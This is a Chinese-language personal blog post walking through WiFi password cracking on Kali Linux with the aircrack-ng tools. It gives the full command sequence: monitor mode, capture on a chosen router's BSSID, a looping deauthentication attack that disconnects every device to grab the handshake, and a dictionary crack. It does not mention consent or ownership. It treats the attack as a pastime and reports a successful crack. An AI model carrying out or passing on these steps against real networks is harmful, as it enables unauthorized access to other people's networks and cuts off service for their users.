Kali Airmon-ng工具破解wifi


关于wifi破解的事情上次动手的时候还是去年或前年了,这几天闲来无事晚上又典型的夜猫子所以就计划动手再搞一搞…
拿出吃灰已久的带有网络监听功能的无线网卡接到kali的虚拟机上(无线网卡的监听功能主要是用来监听搜索到的wifi数据包以便抓包利用)

接下来就开始正式的wifi破解因为权限的问题该工具要求切换到root账户下才可以正常使用,切换权限后可以先执行iwconfig命令看到当前的无线网卡的监听模式是否已经开启(我这里已经开启了)

开启无线网卡的监听模式

开启无线网卡的监听模式只需要执行bash airmon-ng start wlan0即可(wlan0为网卡名称,当然也有可能是其他的名称,比如wlan1,可以通过ifconfig命令查看无线网卡的名称)

开通监听模式后的无线网卡名称由‘wlan0’变成了’wlan0mon‘,且Mode后面变成了Monitor

关闭影响监听模式的进程

执行airmon-ng check kill把不需要的进程关闭

开启无线网卡的监听模式

执行airmon-ng start wlan0mon开启网卡的监听进程

搜索无线网络

执行airodump-ng wlan0mon搜索无线网络信息,可以看到有很多的wifi被搜索到了,此时可以ctrl+c停止命令

选择攻击目标,监听网络路由信息

选择目标wifi,执行airodump-ng -c 11 --bssid 94:C9:B7:E5:FE:1D -w test1wifi wlan0mon命令对目标路由监听

通过下图可以看到该路由一共接入的设备有2台

⚠️:上面的终端不能关,命令不要停止

对目标wifi断网攻击,捕获设备重连wifi数据包

打开一个新的终端,执行aireplay-ng -0 0 -a 94:C9:B7:E5:FE:1D wlan0mon命令要求目标路由断开全部已连接设备
(命令解释:-0代表发起网络冲突攻击模式,0代表循环攻击,不停的断开连接,-a指定地址)

这个时候被断开的设备会自动重新连接该路由的网络,返回到上面的监听终端可以看到已经获取到了设备重新连接wifi的数据包

获取到数据包后记得ctrl+c把命令停止,否则会一直断网攻击的
破解已截获的数据包
为了方便破解wifi,将上述步骤中截获到的数据包.cap文件和破解用到的密码字典文件放到一个文件夹内
执行aircrack-ng -w password.txt test1-02.cap命令后就开始破解了

破解速度取决于电脑的硬件和字典的大小以及一些社会工程学的需要,如果有一个非常好的字典破解起来时很快的,不然需要的时间会非常长


1.带有监听功能的无线网卡直接淘宝即可
2.此种方式适合闲来无事做,而且碰运气成分比较重要,因为不是所有人的wifi密码都很简单的,如果是大小写字母+数字+特殊字符,恐怕要天荒地老了….


2023-01-29 12:29:21 星期日
实践的比较晚,之前已经是年前回家的最后一天了,年后回来了继续跑,结局喜人。

正文完

搜索